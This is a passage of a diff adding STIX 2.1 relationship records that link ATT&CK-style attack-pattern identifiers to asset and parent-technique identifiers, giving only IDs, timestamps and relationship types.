"2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f4966122-7aba-4f94-bef4-f7b78f8fd0f9", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f4afb180-4b30-4ed1-b094-3d74d8fd0cf1", + "created": "2023-09-28T19:49:56.464Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:49:56.464Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f4b92f04-7ff8-45b4-92be-783d6aa98618", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a750a9f6-0bde-4bb3-9aae-1e2786e9780c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f4c03f0c-0d1a-41cd-bd26-e549fe68c61a", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f4c17470-c5c0-4680-ad4a-5efae63b0be6", + "created": "2020-01-30T19:57:16.539Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--a257ed11-ff3b-4216-8c9d-3938ef57064c", + "target_ref": "attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f4c8b1b6-8204-4cbd-be5b-f3a6080726e7", + "created": "2020-02-19T18:46:06.856Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004", + "target_ref": "attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f4dc8dba-ec23-4d49-a736-c5b1edf5e53e", + "created": "2020-03-16T15:38:37.810Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--cf7b3a06-8b42-4c33-bbe9-012120027925", + "target_ref": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f4e1f2a9-9b8c-4acb-8758-63ae3a8b8140", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f507b039-3afd-4cf8-9fd6-2430959ed20b", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f50c8c4d-894d-493a-9bba-ad2cdd072bd1", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b7dc639b-24cd-482d-a7f1-8897eda21023", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f531e763-3550-40ba-a6a1-81e208ca12c6", + "created": "2023-09-29T16:41:06.217Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:41:06.217Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f54e66ec-9364-4dc0-a574-0f0f95decb0c", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f5621ad9-c905-42e3-b59b-e0ae7b9051c7", + "created": "2023-09-28T21:26:23.361Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:26:23.361Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f56320fe-f20d-4af2-b3e4-3881342983b4", + "created": "2024-06-21T14:12:20.277Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.277Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f577a097-728b-409b-aa93-ea25e644c4ec", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f58583fd-c107-4ec6-8793-f20f229f3a42", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f58735e2-3b33-43eb-a55f-aa343bb6ae1a", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6add2ab5-2711-4e9d-87c8-7a0be8531530", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f5883164-2d6b-4b0b-bc2a-612425ea3bc4", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f599d524-5fe5-44dd-a647-54ee6a159ac7", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f5c91d82-5f7c-4e40-a85a-4f1909ae5545", + "created": "2023-09-29T18:44:50.280Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:44:50.280Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f5c9f641-a498-46b5-9068-39502db53cfd", + "created": "2023-09-28T20:10:55.590Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:10:55.590Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f5cd3895-d703-4e5e-9a02-f0ab202ad2b3", + "created": "2024-06-26T13:43:04.788Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:43:04.788Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f5e45230-2f14-485c-8727-f133a3d9167b", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f5ede0fc-f652-4e7b-bf4e-370d31868656", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f5fc2b7c-72d3-47be-8287-9608b6beb63d", + "created": "2020-08-24T13:43:00.187Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b", + "target_ref": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f603a3f0-c155-44bf-b2e2-58e32d84a2db", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f608aa71-4a1a-4bac-939b-3d2ea1fcb3f2", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f6096477-885c-4997-98a1-6bc4c2883c63", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f61944a4-fef5-4989-bc3d-68f86e65d7d4", + "created": "2023-09-29T17:04:55.720Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:04:55.720Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f61e474c-d7be-411e-a30e-0a1ef872fe51", + "created": "2023-09-29T17:05:20.132Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:05:20.132Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f6283489-184c-483a-9c40-025d767b014a", + "created": "2024-06-21T14:12:20.266Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.266Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2db31dcd-54da-405d-acef-b9129b816ed6", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f62d3ec1-abf5-4e53-9bff-ea31d4db6f0f", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f630f321-d227-414b-9272-fe19268779e0", + "created": "2020-10-02T16:42:42.607Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--baf60e1a-afe5-4d31-830f-1b1ba2351884", + "target_ref": "attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f63e62f6-d350-43b7-9ab0-c37b0804f88f", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f63fbf23-e25a-4cbd-a2ae-6c53c54562c1", + "created": "2024-07-02T13:55:55.747Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.747Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f6514d17-d599-4a45-93b2-a80b4aa39dde", + "created": "2020-01-31T12:36:39.323Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f655a1b9-de05-47af-8dd1-b4b239bc0920", + "created": "2024-06-27T08:51:46.827Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T08:51:46.827Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--890c9858-598c-401d-a4d5-c67ebcdd703a", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f655e6a0-431c-4996-859d-2e1952f26d2e", + "created": "2020-10-02T16:01:35.489Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], 